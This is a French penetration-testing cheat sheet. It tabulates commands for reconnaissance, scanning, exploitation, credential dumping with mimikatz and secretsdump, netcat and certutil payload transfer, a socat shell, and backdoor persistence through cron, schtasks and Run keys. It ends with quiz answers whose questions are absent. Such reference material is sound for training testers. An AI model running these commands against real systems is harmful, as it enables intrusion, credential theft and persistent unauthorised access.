Recueil des commandes indispensables en test d'intrusion : reconnaissance, scanning, exploitation, post-exploitation, maintien d'accès, et transfert de fichiers. Chaque commande est présentée avec sa syntaxe, ses options clés et un exemple d'usage. À usage strictement professionnel et légal.
| Commande | Utilité | Exemple |
|---|---|---|
| theHarvester -d <domaine> -b <source> | Collecte d'emails et sous-domaines | theHarvester -d exemple.com -b google,bing |
| recon-ng | Framework modulaire d'OSINT | workspace create cible; marketplace install; modules load |
| dig <domaine> any | Interrogation DNS complète | dig exemple.com any |
| whois <domaine> | Informations WHOIS | whois exemple.com |
| shodan search <query> | Recherche sur Shodan (API requise) | shodan search 'port:22 country:FR' |
| Commande | Options / Description | Exemple |
|---|---|---|
| nmap -sS -sV -O -T4 <cible> | SYN scan, versions, OS, vitesse élevée | nmap -sS -sV -O -T4 192.168.1.0/24 |
| nmap -p- -A <cible> | Tous les ports (1-65535), détection agressive | nmap -p- -A 192.168.1.10 |
| masscan -p1-65535 --rate=10000 <cidr> | Scan ultra-rapide | masscan -p1-65535 --rate=10000 192.168.1.0/24 |
| nc -zv <ip> <port> | Test de connexion TCP (netcat) | nc -zv 192.168.1.10 22 |
| rustscan -a <ip> | Scan rapide avec détection de services | rustscan -a 192.168.1.0/24 |
| Commande | Utilité | Exemple |
|---|---|---|
| nikto -h <url> | Scan de vulnérabilités web | nikto -h http://192.168.1.100 |
| nuclei -u <url> -t <template> | Scan basé sur des templates | nuclei -u http://192.168.1.100 -t cves/ |
| openvas-cli | Scan via OpenVAS (nécessite setup) | omp -u admin -w password -T <target> |
| nessuscli | Scan avec Nessus (ligne de commande) | nessuscli scan list |
| Commande | Description | Exemple |
|---|---|---|
| msfconsole | Lancement du framework Metasploit | use exploit/windows/smb/ms17_010_eternalblue ; set RHOSTS <ip> ; exploit |
| sqlmap -u <url> --dbs | Injection SQL automatisée | sqlmap -u 'http://target.com/page?id=1' --dbs |
| hydra -l <user> -P <passfile> ssh://<ip> | Attaque par force brute SSH | hydra -l root -P rockyou.txt ssh://192.168.1.10 |
| john <hashfile> | Cracker de hash (mode wordlist) | john --wordlist=rockyou.txt hashes.txt |
| hashcat -m <mode> <hashfile> <wordlist> | Cracker de hash (GPU) | hashcat -m 1000 -a 0 hashes.txt rockyou.txt |
| Commande | Utilité | Exemple |
|---|---|---|
| mimikatz | Extraction de mots de passe et tickets Kerberos | privilege::debug ; sekurlsa::logonpasswords |
| impacket-secretsdump | Dump des hashes SAM et NTDS | impacket-secretsdump domain/user:pass@<DC> |
| bloodhound | Analyse de l'Active Directory pour les chemins d'attaque | Lancer l'ingesteur SharpHound puis analyser avec BloodHound |
| powershell -c <cmd> | Exécution PowerShell à distance | powershell -c 'Invoke-Command -ComputerName SRV -ScriptBlock {Get-Service}' |
| whoami /priv | Voir les privilèges de l'utilisateur (Windows) | whoami /priv |
Exemple de dump des hashes avec impacket depuis un shell Metasploit : meterpreter > load kiwi meterpreter > creds_all ou via impacket : impacket-secretsdump 'DOMAIN/username:password@192.168.1.5'
| Commande | Description | Exemple |
|---|---|---|
| nc -lvnp <port> < fichier | Réception d'un fichier via netcat (côté récepteur) | nc -lvnp 4444 > received.exe |
| nc -nv <ip> <port> < fichier | Envoi d'un fichier (côté émetteur) | nc -nv 10.0.0.5 4444 < payload.exe |
| socat TCP-LISTEN:<port>,reuseaddr,fork EXEC:/bin/sh | Shell reverse via socat (serveur) | socat TCP-LISTEN:4444,fork EXEC:/bin/sh |
| ssh -D <port> user@<host> | Tunnel SOCKS5 (proxy dynamique) | ssh -D 1080 user@bastion |
| certutil -urlcache -f <url> <fichier> | Téléchargement de fichier (Windows) | certutil -urlcache -f http://server/payload.exe payload.exe |
| wget <url> | Téléchargement simple (Linux) | wget http://server/script.sh |
| curl -O <url> | Téléchargement avec curl | curl -O http://server/file |
| Commande | Méthode | Exemple |
|---|---|---|
| crontab -e (Linux) | Tâche planifiée cron | Ajouter @reboot /path/to/backdoor |
| schtasks /create (Windows) | Tâche planifiée | schtasks /create /tn Update /tr C:\backdoor.exe /sc onstart /ru SYSTEM |
| reg add (Windows) | Clé de registre pour exécution au démarrage | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\backdoor.exe |
| ssh -R <port>:localhost:<port> user@server | Reverse SSH tunnel | ssh -R 2222:localhost:22 user@remote |
✅ Réponse : -sV
✅ Réponse : Mimikatz
✅ Réponse : certutil -urlcache
✅ Réponse : RHOST
✅ Réponse : ssh -D
✅ Réponse : Hydra
✅ Réponse : Scanne tous les ports TCP (1-65535)
✅ Réponse : nc -lvnp 4444
✅ Réponse : BloodHound
✅ Réponse : hashcat -m 0 -a 0 hash.txt wordlist.txt